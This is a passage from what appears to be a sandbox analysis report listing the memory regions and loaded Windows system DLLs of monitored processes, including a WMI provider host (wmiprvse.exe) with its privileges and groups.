region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2483
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2484
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2485
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2486
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2487
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2488
start_va = 0x7fef78c0000
end_va = 0x7fef78e7fff
monitored = 0
entry_point = 0x7fef78c1408
region_type = mapped_file
name = "ulib.dll"
filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll")
Region:
id = 2489
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2490
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2491
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2492
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2493
start_va = 0xc0000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2494
start_va = 0x1b0000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2495
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 2504
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 2505
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2506
start_va = 0x120000
end_va = 0x12ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2507
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2508
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2509
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2510
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 2511
start_va = 0x6d0000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 2512
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2513
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2520
start_va = 0xe0000
end_va = 0x117fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ulib.dll.mui"
filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui")
Thread:
id = 118
os_tid = 0xd4c
Process:
id = "21"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x4f698000"
os_pid = "0xcb4"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "rpc_server"
parent_id = "5"
os_parent_pid = "0x254"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000735c4" [0xc000000f]
Region:
id = 2613
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2614
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2615
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2616
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2617
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2618
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 2619
start_va = 0x70000
end_va = 0x74fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 2620
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 2621
start_va = 0x90000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2622
start_va = 0x110000
end_va = 0x110fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 2623
start_va = 0x120000
end_va = 0x21ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 2624
start_va = 0x220000
end_va = 0x286fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2625
start_va = 0x290000
end_va = 0x38ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2626
start_va = 0x390000
end_va = 0x517fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000390000"
filename = ""
Region:
id = 2627
start_va = 0x520000
end_va = 0x6a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 2628
start_va = 0x6b0000
end_va = 0x76ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 2629
start_va = 0x770000
end_va = 0xa3efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2630
start_va = 0xa40000
end_va = 0xa40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a40000"
filename = ""
Region:
id = 2631
start_va = 0xa50000
end_va = 0xa5cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 2632
start_va = 0xa80000
end_va = 0xa82fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cimwin32.dll.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui")
Region:
id = 2633
start_va = 0xbe0000
end_va = 0xc5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000be0000"
filename = ""
Region:
id = 2634
start_va = 0xcf0000
end_va = 0xd6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000cf0000"
filename = ""
Region:
id = 2635
start_va = 0xe70000
end_va = 0xeeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e70000"
filename = ""
Region:
id = 2636
start_va = 0xf00000
end_va = 0xf7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 2637
start_va = 0x1030000
end_va = 0x10affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001030000"
filename = ""
Region:
id = 2638
start_va = 0x10b0000
end_va = 0x11affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2639
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 2640
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2641
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2642
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2643
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2644
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2645
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2646
start_va = 0x13fef0000
end_va = 0x13ff5bfff
monitored = 0
entry_point = 0x13ff2b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 2647
start_va = 0x7fef2410000
end_va = 0x7fef2609fff
monitored = 1
entry_point = 0x7fef2424c9c
region_type = mapped_file
name = "cimwin32.dll"
filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll")
Region:
id = 2648
start_va = 0x7fef4dd0000
end_va = 0x7fef4e12fff
monitored = 0
entry_point = 0x7fef4df1b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 2649
start_va = 0x7fef9690000
end_va = 0x7fef96a1fff
monitored = 0
entry_point = 0x7fef96989d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 2650
start_va = 0x7fef97d0000
end_va = 0x7fef97f0fff
monitored = 0
entry_point = 0x7fef97e03b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 2651
start_va = 0x7fef98f0000
end_va = 0x7fef9902fff
monitored = 0
entry_point = 0x7fef98f1d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 2652
start_va = 0x7fef9be0000
end_va = 0x7fef9c06fff
monitored = 0
entry_point = 0x7fef9be11a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 2653
start_va = 0x7fef9c10000
end_va = 0x7fef9ce2fff
monitored = 0
entry_point = 0x7fef9c88b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 2654
start_va = 0x7fef9e70000
end_va = 0x7fef9ee6fff
monitored = 1
entry_point = 0x7fef9eae7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 2655
start_va = 0x7fefb130000
end_va = 0x7fefb13efff
monitored = 0
entry_point = 0x7fefb131040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 2656
start_va = 0x7fefb770000
end_va = 0x7fefb79bfff
monitored = 0
entry_point = 0x7fefb7715c4
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2657
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2658
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2659
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2660
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2661
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 2662
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2663
start_va = 0x7fefce50000
end_va = 0x7fefcea6fff
monitored = 0
entry_point = 0x7fefce55e38
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 2664
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2665
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2666
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2667
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2668
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2669
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2670
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2671
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2672
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2673
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2674
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 2675
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2676
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2677
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2678
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2679
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2680
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2681
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2682
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2683
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2684
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2685
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2686
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2687
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2688
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2689
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2690
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2691
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2692
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2693
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 2694
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 2695
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2696
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2697
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 2698
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2699
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 2700
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2701
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2702
start_va = 0xa60000
end_va = 0xa65fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 2703
start_va = 0xb10000
end_va = 0xb8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 2704
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2705
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2706
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2707
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2708
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2709
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2710
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2711
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2712
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 2713
start_va = 0xa60000
end_va = 0xa60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 2714
start_va = 0xa70000
end_va = 0xa76fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
